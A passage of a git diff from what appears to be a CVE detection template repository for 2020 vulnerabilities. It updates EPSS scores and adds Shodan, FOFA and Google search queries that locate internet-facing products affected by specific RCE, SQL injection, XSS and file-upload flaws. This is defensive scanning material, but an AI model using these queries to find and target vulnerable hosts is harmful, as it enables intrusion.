https://nvd.nist.gov/vuln/detail/CVE-2020-20285 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37789 + epss-score: 0.00182 + epss-percentile: 0.55354 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index a2a35f76f7..bd330c1754 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -29,6 +29,7 @@ info: vendor: weiphp product: weiphp shodan-query: http.html:"WeiPHP5.0" + fofa-query: body="weiphp" tags: cve,cve2020,weiphp,sql,sqli http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index be479fca2a..e6d5ba3cae 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2020-2036 cwe-id: CWE-79 epss-score: 0.03232 - epss-percentile: 0.91005 + epss-percentile: 0.91222 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve2020,cve,vpn,xss,paloaltonetworks http: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 8fe9b69322..0d6cd0c2db 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2096 cwe-id: CWE-79 epss-score: 0.96965 - epss-percentile: 0.99712 + epss-percentile: 0.99727 cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 @@ -29,6 +29,8 @@ info: product: gitlab_hook framework: jenkins shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm http: diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 6ee8c91260..6727f23c8e 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -12,13 +12,14 @@ info: reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - epss-score: 0.01894 - epss-percentile: 0.8721 + epss-score: 0.02028 + epss-percentile: 0.8889 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index f980c8c7c8..d1a2ffdb2e 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - epss-score: 0.07235 - epss-percentile: 0.93887 + epss-score: 0.07351 + epss-percentile: 0.94065 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 5adba642ed..b7acdfb1a4 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - epss-score: 0.00534 - epss-percentile: 0.76681 + epss-score: 0.00527 + epss-percentile: 0.76943 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 vendor: jenkins product: jenkins shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve,cve2020,jenkins http: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 2067c059b4..7255e5e5be 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - epss-percentile: 0.54462 + epss-percentile: 0.55271 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index ff8cb13e1b..6025551523 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-22208 cwe-id: CWE-89 - epss-score: 0.19578 - epss-percentile: 0.9585 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 0b164d90aa..137f120d57 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22209 cwe-id: CWE-89 - epss-score: 0.15522 - epss-percentile: 0.95775 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 5002d18314..71d65d54bc 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.20254 - epss-percentile: 0.95933 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 6ce1741b67..ac7a1d257c 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22211 cwe-id: CWE-89 - epss-score: 0.20254 - epss-percentile: 0.95933 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index ef03b8ae04..db201321a1 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.54178 + epss-percentile: 0.55016 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: opnsense product: opnsense + shodan-query: http.title:"opnsense" + fofa-query: title="opnsense" + google-query: intitle:"opnsense" tags: cve2020,cve,redirect,opnsense http: diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 8311519908..90a5e336be 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - epss-score: 0.00132 - epss-percentile: 0.47292 + epss-score: 0.00135 + epss-percentile: 0.48718 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: high_cms shodan-query: title:"HighMail" fofa-query: title="HighMail" + google-query: intitle:"highmail" tags: cve,cve2020,xss,cms,highmail,aryanic http: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index e236d1f6dd..b7b83f77e9 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -19,13 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.01489 - epss-percentile: 0.85494 + epss-score: 0.01689 + epss-percentile: 0.87694 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kyocera product: d-copia253mf_plus_firmware + shodan-query: http.favicon.hash:-50306417 + fofa-query: icon_hash=-50306417 tags: cve2020,cve,printer,iot,lfi,edb,kyocera http: diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index ecb351c611..21cd1ee210 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37812 + epss-percentile: 0.38392 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: monstra product: monstra_cms + shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 42abc155aa..5c30f563dd 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - epss-score: 0.15451 - epss-percentile: 0.95765 + epss-score: 0.1917 + epss-percentile: 0.96258 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -27,6 +27,7 @@ info: product: import_xml_and_rss_feeds framework: wordpress fofa-query: body="import-xml-feed" + shodan-query: http.html:"import-xml-feed" tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 0b96ab896d..a11fbbd5a2 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - epss-score: 0.97448 - epss-percentile: 0.99947 + epss-score: 0.97489 + epss-percentile: 0.99973 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 479d3e3e4b..cf1285a2b9 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - epss-score: 0.02041 - epss-percentile: 0.87791 + epss-score: 0.01622 + epss-percentile: 0.87473 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 37cae3cbaa..a6fc48b68f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -27,6 +27,9 @@ info: vendor: mongo-express_project product: mongo-express framework: node.js + shodan-query: http.title:"mongo express" + fofa-query: title="mongo express" + google-query: intitle:"mongo express" tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js http: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 88a4b2c5d0..7e7da2b9eb 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.04563 - epss-percentile: 0.9232 + epss-score: 0.05447 + epss-percentile: 0.93154 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 54828aaffe..59d9e17037 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24589 cwe-id: CWE-611 - epss-score: 0.65955 - epss-percentile: 0.97835 + epss-score: 0.64778 + epss-percentile: 0.97891 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve2020,cve,wso2,xxe,oast,blind http: diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index f2bc0fc8b8..8ac6e19024 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24701 cwe-id: CWE-79 - epss-score: 0.00818 - epss-percentile: 0.81463 + epss-score: 0.00816 + epss-percentile: 0.8179 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" + fofa-query: body="appsuite" tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange http: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index d74e13a076..fe24e7e56c 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24902 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56453 + epss-percentile: 0.5699 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: quixplorer shodan-query: http.title:"My Download Server" google-query: intitle:"My Download Server" + fofa-query: title="my download server" tags: cve,cve2020,quixplorer,xss,quixplorer_project http: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 0768866d5e..ce62d05cfc 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24903 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.67095 + epss-percentile: 0.67701 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 56b58ad4e6..308f2afbe1 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24912 cwe-id: CWE-79 epss-score: 0.00346 - epss-percentile: 0.7108 + epss-percentile: 0.71607 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index bd8314a444..9a0e51e49b 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - epss-score: 0.97381 - epss-percentile: 0.99899 + epss-score: 0.97395 + epss-percentile: 0.99916 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index cd19370ce5..03e13e70b3 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25223 cwe-id: CWE-78 - epss-score: 0.97508 - epss-percentile: 0.99981 + epss-score: 0.97521 + epss-percentile: 0.99989 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sophos product: unified_threat_management + shodan-query: http.title:"securepoint utm" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2020,sophos,rce,oast,unauth,kev http: diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 5baf81dbeb..3fc5fbcc3a 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -27,6 +27,8 @@ info: max-request: 2 vendor: dlink product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 58d1bf46eb..d64fd22ac7 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -14,17 +14,22 @@ info: - https://github.com/hktalent/CVE-2020-2551 - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 - https://www.oracle.com/security-alerts/cpujan2020.html + - https://github.com/neilzhang1/Chinese-Charts + - https://github.com/pjgmonteiro/Pentest-tools classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - epss-score: 0.97491 - epss-percentile: 0.99973 + epss-score: 0.97537 + epss-percentile: 0.99993 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,weblogic,rce,unauth,kev http: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 8557d20b49..0a03ff33ee 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - epss-score: 0.96711 - epss-percentile: 0.99631 + epss-score: 0.96513 + epss-percentile: 0.99597 cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 681c606c24..85a7fc395f 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-25864 cwe-id: CWE-79 epss-score: 0.00324 - epss-percentile: 0.70154 + epss-percentile: 0.70681 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 vendor: hashicorp product: consul + shodan-query: http.title:"consul by hashicorp" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: cve,cve2020,consul,xss,intrusive,hashicorp http: diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 4a4876eacf..31d70be1ec 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 - epss-score: 0.01546 - epss-percentile: 0.85739 + epss-score: 0.01324 + epss-percentile: 0.85971 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index bcad0d4ac7..a9b1045b02 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97384 - epss-percentile: 0.99904 + epss-percentile: 0.99909 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 2eb92d4c72..c9e41d9290 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -20,14 +20,16 @@ info: cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - epss-score: 0.74714 - epss-percentile: 0.97878 + epss-score: 0.78637 + epss-percentile: 0.9826 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql http: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 1125f75f3d..fcac697eaa 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: emby product: emby + shodan-query: http.title:"emby" + fofa-query: title="emby" + google-query: intitle:"emby" tags: cve2020,cve,emby,jellyfin,ssrf http: diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index e7a2ec4233..1b2c984cbc 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - epss-score: 0.29301 - epss-percentile: 0.96779 + epss-score: 0.19944 + epss-percentile: 0.96328 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index e6cea59742..c3ff473896 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: processwire product: processwire + shodan-query: http.html:"processwire" + fofa-query: body="processwire" tags: cve,cve2020,processwire,lfi,cms,oss http: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 83c85522de..e311fbcca2 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.12857 - epss-percentile: 0.94961 + epss-score: 0.11692 + epss-percentile: 0.95277 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 2b26c83f60..69fb387790 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -28,6 +28,8 @@ info: vendor: redhat product: keycloak shodan-query: "title:\"keycloak\"" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,exposure http: diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 38de085046..b8714487f4 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 - epss-score: 0.00363 - epss-percentile: 0.69495 + epss-score: 0.0045 + epss-percentile: 0.75056 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 1ce2c00bcc..a331f1c2fb 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - epss-score: 0.00178 - epss-percentile: 0.55072 + epss-score: 0.00252 + epss-percentile: 0.65095 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: mail_server shodan-query: title:"icewarp" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve,cve2020,xss,icewarp,packetstorm http: diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index b1f11242bd..d537647c4d 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27986 cwe-id: CWE-306 - epss-score: 0.25376 - epss-percentile: 0.96582 + epss-score: 0.3688 + epss-percentile: 0.97174 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 7d8080615c..bea963d0ad 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -21,7 +21,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00465 - epss-percentile: 0.74945 + epss-percentile: 0.75439 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 2651659e44..cfd5a2452b 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 - epss-score: 0.97279 - epss-percentile: 0.99845 + epss-score: 0.97298 + epss-percentile: 0.99867 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos + fofa-query: '"terramaster" && header="tos"' tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index c02225fcab..76ca5cba57 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rocket.chat product: rocket.chat + shodan-query: http.title:"rocket.chat" + fofa-query: title="rocket.chat" + google-query: intitle:"rocket.chat" tags: cve,cve2020,packetstorm,rocketchat,rocket.chat http: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index edc2af0649..cbb4b49bd1 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -20,15 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - epss-score: 0.96907 - epss-percentile: 0.99693 + epss-score: 0.96887 + epss-percentile: 0.99706 cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 vendor: monitorr product: monitorr + fofa-query: icon_hash="-211006074" + shodan-query: http.favicon.hash:"-211006074" tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project - variables: string: "CVE-2020-28871" diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f08711f054..19444ba22b 100644 --- 